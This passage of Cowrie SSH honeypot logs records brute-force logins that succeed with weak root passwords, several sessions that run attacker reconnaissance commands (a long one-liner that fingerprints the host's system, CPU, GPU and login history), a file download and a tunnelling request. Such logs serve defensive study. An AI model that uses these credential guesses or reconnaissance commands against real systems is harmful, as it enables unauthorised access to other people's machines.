256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:29.753056Z","src_ip":"212.227.125.160","session":"79bb2f9f1b8c"}
{"eventid":"cowrie.login.failed","username":"technician","password":"technician","message":"login attempt [technician/technician] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:29.962833Z","src_ip":"212.227.125.160","session":"79bb2f9f1b8c"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:59:29.981539Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.session.connect","src_ip":"89.248.168.227","src_port":48722,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3fd748eb5a7","protocol":"ssh","message":"New connection: 89.248.168.227:48722 (1.2.3.4:22) [session: c3fd748eb5a7]","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.234061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.241381Z","src_ip":"89.248.168.227","session":"c3fd748eb5a7"}
{"eventid":"cowrie.client.kex","hassh":"17a5327c6d9842baa58d02440dccabc6","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 17a5327c6d9842baa58d02440dccabc6","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.382772Z","src_ip":"89.248.168.227","session":"c3fd748eb5a7"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.403077Z","src_ip":"89.248.168.227","session":"c3fd748eb5a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:59:30.718248Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.719049Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.719690Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.720765Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.722577Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.723993Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.725156Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.726675Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.727484Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.728354Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.729191Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.730058Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:59:30.731560Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:59:31.003044Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:31.004087Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:31.005401Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:31.109260Z","src_ip":"212.227.125.160","session":"79bb2f9f1b8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34880,"dst_ip":"1.2.3.4","dst_port":22,"session":"fee81b5f1af6","protocol":"ssh","message":"New connection: 212.227.125.160:34880 (1.2.3.4:22) [session: fee81b5f1af6]","sensor":"my-vps","timestamp":"2025-08-26T11:59:35.190815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:35.214219Z","src_ip":"212.227.125.160","session":"fee81b5f1af6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:35.254017Z","src_ip":"212.227.125.160","session":"fee81b5f1af6"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:59:35.455643Z","src_ip":"212.227.125.160","session":"fee81b5f1af6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:59:35.646725Z","src_ip":"212.227.125.160","session":"fee81b5f1af6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:59:35.647462Z","src_ip":"212.227.125.160","session":"fee81b5f1af6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:35.803822Z","src_ip":"212.227.125.160","session":"fee81b5f1af6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:35.804992Z","src_ip":"212.227.125.160","session":"fee81b5f1af6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":24599,"dst_ip":"1.2.3.4","dst_port":22,"session":"57d5d46ec649","protocol":"ssh","message":"New connection: 212.227.125.160:24599 (1.2.3.4:22) [session: 57d5d46ec649]","sensor":"my-vps","timestamp":"2025-08-26T11:59:38.662574Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:38.663840Z","src_ip":"212.227.125.160","session":"57d5d46ec649"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":24865,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5124a406c8f","protocol":"ssh","message":"New connection: 212.227.125.160:24865 (1.2.3.4:22) [session: d5124a406c8f]","sensor":"my-vps","timestamp":"2025-08-26T11:59:38.773763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:38.774519Z","src_ip":"212.227.125.160","session":"d5124a406c8f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T11:59:38.887574Z","src_ip":"212.227.125.160","session":"d5124a406c8f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.229018Z","src_ip":"212.227.125.160","session":"d5124a406c8f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.342813Z","session":"d5124a406c8f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":36078,"dst_ip":"1.2.3.4","dst_port":22,"session":"f498104907fe","protocol":"ssh","message":"New connection: 83.168.105.65:36078 (1.2.3.4:22) [session: f498104907fe]","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.564994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.565940Z","src_ip":"83.168.105.65","session":"f498104907fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.602993Z","src_ip":"83.168.105.65","session":"f498104907fe"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.716077Z","src_ip":"83.168.105.65","session":"f498104907fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:59:39.807799Z","src_ip":"83.168.105.65","session":"f498104907fe"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.808519Z","src_ip":"83.168.105.65","session":"f498104907fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35650,"dst_ip":"1.2.3.4","dst_port":22,"session":"edc59628ad12","protocol":"ssh","message":"New connection: 212.227.125.160:35650 (1.2.3.4:22) [session: edc59628ad12]","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.809927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.810746Z","src_ip":"212.227.125.160","session":"edc59628ad12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.846903Z","src_ip":"83.168.105.65","session":"f498104907fe"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:39.847948Z","src_ip":"83.168.105.65","session":"f498104907fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:41.587276Z","src_ip":"212.227.125.160","session":"edc59628ad12"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:42.588439Z","src_ip":"212.227.125.160","session":"edc59628ad12"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:43.657379Z","src_ip":"212.227.125.160","session":"edc59628ad12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36420,"dst_ip":"1.2.3.4","dst_port":22,"session":"94cd91631b0c","protocol":"ssh","message":"New connection: 212.227.125.160:36420 (1.2.3.4:22) [session: 94cd91631b0c]","sensor":"my-vps","timestamp":"2025-08-26T11:59:46.845114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:46.845766Z","src_ip":"212.227.125.160","session":"94cd91631b0c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.